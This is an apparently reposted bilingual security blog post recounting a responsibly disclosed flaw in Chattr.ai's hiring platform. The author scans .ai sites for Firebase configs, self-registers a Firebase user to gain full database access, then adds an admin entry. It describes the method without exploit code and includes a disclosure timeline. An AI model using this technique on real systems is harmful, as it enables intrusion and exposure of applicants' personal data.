Also checkout Eva’s blogpost of this event.
另请查看 Eva 关于此活动的博客文章。
With an upbeat pling my console alerted me that my script had finished running, to be precise it was searching for exposed Firebase credentials on any of the hundreds of recent AI startups.
我的控制台乐观地提醒我,我的脚本已经完成运行,准确地说,它正在搜索最近数百家 AI 初创公司中任何一家公开的 Firebase 凭据。
This was achieved through a public list of sites using the .ai
TLD and parsing the site data (and any referenced .js bundles) for references to common Firebase initialisation variables.
这是通过使用 .ai
TLD 的公共网站列表并解析网站数据(以及任何引用的 .js 捆绑包)以引用常见的 Firebase 初始化变量来实现的。
Production: {
apiKey: "AIza<Insert_Funny_Joke_Here>",
authDomain: "KFC.firebaseapp.com",
databaseURL: "https://KFC.firebaseio.com",
projectId: "KFC",
storageBucket: "KFC.appspot.com",
messagingSenderId: "123456789"
}
My hunch was that in the rush to push their new shiny product, someone would take a shortcut and forget to implement proper security rules.
我的预感是,在匆忙推出他们的新闪亮产品时,有人会走捷径而忘记实施适当的安全规则。
The hunch was right, and it was worse than I could’ve ever guessed.
预感是对的,而且比我想象的还要糟糕。
Meet Chattr.ai 认识 Chattr.ai
…The self proclaimed AI hiring system that claims to shave 88% of the time off hiring new people.
…自称是人工智能的招聘系统,声称可以节省88%的招聘新人时间。
They provide their services to a massive number of fast food chains and other hourly employers around the United States, including but not limited to:
他们为美国各地的大量快餐连锁店和其他小时工雇主提供服务,包括但不限于:
- Applebees 苹果蜜蜂
- Arbys 阿比斯
- Chickfila 奇克菲拉
- Dunkin 邓肯
- IHOP IHOP公司
- KFC
- Shoneys 蜂蜜
- Subway 地铁
- Tacobell 塔科贝尔
- Target 目标
- Wendys 温迪斯
The Vulnerability 漏洞
If you drop the Firebase configuration from the JS bundle into Firepwn, you start out with zero permissions as you can see in the following screenshot.
如果将 Firebase 配置从 JS 捆绑包拖放到 Firepwn 中,则开始时的权限为零,如以下屏幕截图所示
But if you use Firebase’s registration feature to create a new user (you cannot register on their site), you get full privileges (read/write) to the Firebase DB.
但是,如果您使用 Firebase 的注册功能创建新用户(您无法在他们的网站上注册),您将获得对 Firebase DB 的全部权限(读/写)。
The data it exposes includes and is not limited to:
它公开的数据包括但不限于:
- Names 名字
- Phone numbers 电话号码
- Emails 电子邮件
- Plaintext passwords (Only some account’s had exposed passwords)
明文密码(只有某些帐户的密码公开) - Locations of branches 分行位置
- Confidential messages 机密消息
- Shifts 变化
For the following: 对于以下内容:
- Chattr employees Chattr 员工
- Franchisee managers 加盟商经理
- Job applicants 求职者
It Gets… Worse?! 它得到…更 糟?!
Yeah, it somehow manages to get even worse.
是的,它以某种方式设法变得更糟。
If you grab the list of admin users from /orgs/0/users
, you can splice a new entry into it giving you full access to their Administrator dashboard.
如果您从 中 /orgs/0/users
获取管理员用户列表,则可以将新条目拼接到其中,从而完全访问其管理员仪表板。
As you can see below, it allows for even more control over their systems including accepting/denying applicants or even refunding payments made to Chattr.
正如您在下面看到的,它允许对他们的系统进行更多控制,包括接受/拒绝申请人,甚至退还支付给 Chattr 的款项。
Timeline (DD/MM) 时间线 (DD/MM)
- 06/01 – Vulnerability Discovered
06/01 – 发现漏洞 - 09/01 – Write-up completed & Emailed to them
09/01 – 完成撰写并通过电子邮件发送给他们 - 10/01 – Vulnerability patched
10/01 – 漏洞已修补 - 11/01 – Support ticket closed, no thanks or further contact received despite explicitly requesting it
11/01 – 支持票已关闭,尽管明确请求,但未收到任何感谢或进一步联系
Credits 学分
To my friends who assisted me with this pentest and responsible disclosure of such
感谢我的朋友,他们帮助我进行了这个笔试,并负责任地披露了这样的情况
- Logykk 洛吉克
- Eva – https://kibty.town/blog/chattr
伊娃 – https://kibty.town/blog/chattr
原文始发于MrBruh’s Epic Blog:How I pwned half of America’s fast food chains, simultaneously.
转载请注明:How I pwned half of America’s fast food chains, simultaneously. | CTF导航